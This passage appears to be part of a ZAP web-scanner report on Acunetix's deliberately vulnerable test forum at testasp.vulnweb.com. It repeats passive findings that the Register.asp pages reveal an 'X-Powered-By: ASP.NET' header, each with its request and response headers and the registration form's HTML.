href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
